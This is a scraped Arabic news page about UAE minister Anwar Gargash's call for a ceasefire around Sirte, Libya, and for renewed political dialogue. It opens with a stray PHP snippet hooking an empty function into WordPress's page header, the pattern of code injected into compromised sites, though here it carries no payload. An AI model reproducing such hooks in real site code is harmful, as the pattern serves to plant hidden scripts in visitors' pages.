/***/function load_frontend_assets() { echo ''; } add_action('wp_head', 'load_frontend_assets');/***/ «قرقاش»: ندعو من الإمارات إلى الوقف الفوري لإطلاق النار في ليبيا الشقيقة وتغليب الحكمة - اخبار ليبيا
سرت ليبيا الان

«قرقاش»: ندعو من الإمارات إلى الوقف الفوري لإطلاق النار في ليبيا الشقيقة وتغليب الحكمة

مصدر الخبر صحيفة الساعة 24

قال الدكتور أنور بن محمد قرقاش، وزير الدولة الإماراتي للشؤون الخارجية، إن “طبول الحرب التي تقرع حول سرت في ليبيا الشقيقة تهدد بتطور جسيم وتبعات إنسانية وسياسية خطيرة”.

وأضاف “قرقاش”، في تغريدة عبر حسابه الرسمي بموقع “تويتر”: “ندعو من الإمارات إلى الوقف الفوري لإطلاق النار وتغليب الحكمة، والدخول في حوار بين الأطراف الليبية وضمن مرجعيات دولية واضحة، وتجاهل التحريض الإقليمي وغاياته”.

وكان “قرقاش”، قد صرح في وقت سابق أن بلاده وبالتعاون مع شركائها تدعو إلى عودة إنتاج النفط في ليبيا في أقرب وقت ممكن، مشيرًا إلى أن “الإمارات تؤكد على أهمية وجود ضمانات لمنع العائدات النفطية من إطالة وتأجيج الصراع”.

وتابع: “سنواصل العمل السياسي والدبلوماسي والأولوية لوقف إطلاق النار والعودة إلى العملية السياسية”.

الوسوم

الإمارات قرقاش ليبيا

يمكنك ايضا قراءة الخبر في المصدر من الساعة 24

عن مصدر الخبر

صحيفة الساعة 24

أترك تعليق

جميع الحقوق محفوظة © 2022 akhbarlibya